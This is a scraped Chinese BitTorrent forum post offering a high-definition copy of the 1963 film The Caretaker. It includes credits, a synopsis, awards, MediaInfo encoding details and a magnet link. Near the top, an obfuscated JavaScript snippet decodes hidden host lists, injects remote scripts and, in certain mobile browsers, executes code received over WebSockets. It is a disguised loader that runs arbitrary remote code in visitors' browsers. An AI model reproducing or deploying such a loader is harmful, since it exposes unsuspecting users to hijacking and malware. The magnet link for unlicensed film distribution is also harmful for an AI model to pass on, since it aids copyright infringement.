看管人[中文字幕].The.Caretaker.1963.1080p.BluRay.x265.10bit.FLAC.1.0 8.58GB

版主小s 1月前 177

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 看管人 / 看门人
◎片  名 The Caretaker
◎年  代 1963
◎产  地 英国
◎类  别 剧情
◎语  言 英语
◎上映日期 1964-01-20
◎IMDb链接 https://www.imdb.com/title/tt0058164/
◎豆瓣链接 https://movie.douban.com/subject/2296775/
◎片  长 105分钟
◎导  演 克莱夫·唐纳 Clive Donner (id:1005464)
◎编  剧 哈罗德·品特 Harold Pinter (id:1028001)
◎演  员 唐纳德·普利森斯 Donald Pleasence (id:1027859)
       罗伯特·肖 Robert Shaw (id:1055263)
       阿兰·贝茨 Alan Bates (id:1007070)
       哈罗德·品特 Harold Pinter (id:1028001)
       理查德·伯顿 Richard Burton (id:1041147)
       诺埃尔·考沃德 Noel Coward (id:1036776)
       伊丽莎白·泰勒 Elizabeth Taylor (id:1031841)
       Michael Birkett Michael Birkett (id:1030853)
       Ron Grainer Ron Grainer (id:1023676)
       尼古拉斯·罗伊格 Nicolas Roeg (id:1022839)
       弗格斯·麦克唐奈尔 Fergus McDonell (id:1291522)
       Reece Pemberton Reece Pemberton (id:1035747)
       Peter Price Peter Price (id:1126226)

◎标  签 英国 / Harold_Pinter / 1960s / 英国电影 / 黑白 / HaroldPinter / 哈罗德·品特 / Clive_Donner

◎简  介
  Aston (Robert Shaw), a quiet, reserved man, lives alone in a top-floor cluttered room of a small abandoned house in a poor London district. He befriends and takes in Mac Davies (Donald Pleasence), an old derelict who has been fired from a menial job in a café. In time Aston offers him a job as caretaker of the house. Aston's brother, Mick (Alan Bates) - a taunting, quasi-sadist...

◎获奖情况 (共2项)
  第13届柏林国际电影节 (1963)
  金熊奖 最佳影片(提名)
   └──克莱夫·唐纳 (id:1005464)
  银熊奖 评审团大奖
   └──克莱夫·唐纳 (id:1005464)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 263743532875436224338477350121816420757 (0xC66B282171E2EDB65A828CE416637195)

  4. Complete name                            : [email protected].COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 8.58 GiB

  8. Duration                                 : 1 h 45 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 11.7 Mb/s

  11. Encoded date                             : UTC 2021-09-04 02:55:53

  12. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@Main

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 45 min

  21. Bit rate                                 : 11.1 Mb/s

  22. Width                                    : 1 792 pixels

  23. Height                                   : 1 080 pixels

  24. Display aspect ratio                     : 5:3

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.238

  31. Stream size                              : 8.13 GiB (95%)

  32. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings                        : rc=crf / crf=20.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1792x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. Format                                   : FLAC

  39. Format/Info                              : Free Lossless Audio Codec

  40. Codec ID                                 : A_FLAC

  41. Duration                                 : 1 h 45 min

  42. Bit rate mode                            : Variable

  43. Bit rate                                 : 529 kb/s

  44. Channel(s)                               : 1 channel

  45. Channel layout                           : C

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 11.719 FPS (4096 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossless

  50. Stream size                              : 399 MiB (5%)

  51. Writing library                          : libFLAC 1.2.1 (UTC 2007-09-17)

  52. Language                                 : English

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Text #1

  56. ID                                       : 3

  57. Format                                   : PGS

  58. Muxing mode                              : zlib

  59. Codec ID                                 : S_HDMV/PGS

  60. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration                                 : 1 h 44 min

  62. Bit rate                                 : 47.0 kb/s

  63. Count of elements                        : 2445

  64. Stream size                              : 35.1 MiB (0%)

  65. Title                                    : chs&eng

  66. Language                                 : Chinese

  67. Default                                  : Yes

  68. Forced                                   : No


  69. Text #2

  70. ID                                       : 4

  71. Format                                   : PGS

  72. Muxing mode                              : zlib

  73. Codec ID                                 : S_HDMV/PGS

  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration                                 : 1 h 44 min

  76. Bit rate                                 : 47.3 kb/s

  77. Count of elements                        : 2445

  78. Stream size                              : 35.4 MiB (0%)

  79. Title                                    : cht&eng

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No


  83. Text #3

  84. ID                                       : 5

  85. Format                                   : PGS

  86. Muxing mode                              : zlib

  87. Codec ID                                 : S_HDMV/PGS

  88. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration                                 : 1 h 44 min

  90. Bit rate                                 : 27.7 kb/s

  91. Count of elements                        : 2445

  92. Stream size                              : 20.7 MiB (0%)

  93. Title                                    : chs

  94. Language                                 : Chinese

  95. Default                                  : No

  96. Forced                                   : No


  97. Text #4

  98. ID                                       : 6

  99. Format                                   : PGS

  100. Muxing mode                              : zlib

  101. Codec ID                                 : S_HDMV/PGS

  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration                                 : 1 h 44 min

  104. Bit rate                                 : 28.0 kb/s

  105. Count of elements                        : 2445

  106. Stream size                              : 20.9 MiB (0%)

  107. Title                                    : cht

  108. Language                                 : Chinese

  109. Default                                  : No

  110. Forced                                   : No


  111. Text #5

  112. ID                                       : 7

  113. Format                                   : PGS

  114. Muxing mode                              : zlib

  115. Codec ID                                 : S_HDMV/PGS

  116. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration                                 : 1 h 40 min

  118. Bit rate                                 : 37.3 kb/s

  119. Count of elements                        : 2624

  120. Stream size                              : 27.0 MiB (0%)

  121. Title                                    : eng

  122. Language                                 : English

  123. Default                                  : No

  124. Forced                                   : No


  125. Menu

  126. 00:00:00.000                             : Chapter 01

  127. 00:04:09.457                             : Chapter 02

  128. 00:12:17.236                             : Chapter 03

  129. 00:24:48.361                             : Chapter 04

  130. 00:32:24.442                             : Chapter 05

  131. 00:45:22.386                             : Chapter 06

  132. 00:51:53.068                             : Chapter 07

  133. 01:00:28.166                             : Chapter 08

  134. 01:14:48.942                             : Chapter 09

  135. 01:22:43.541                             : Chapter 10

  136. 01:30:19.831                             : Chapter 11

  137. 01:36:32.661                             : Chapter 12



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:0B2BBA15ECDCCD6C2403769A2FF9378CA65B3618
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回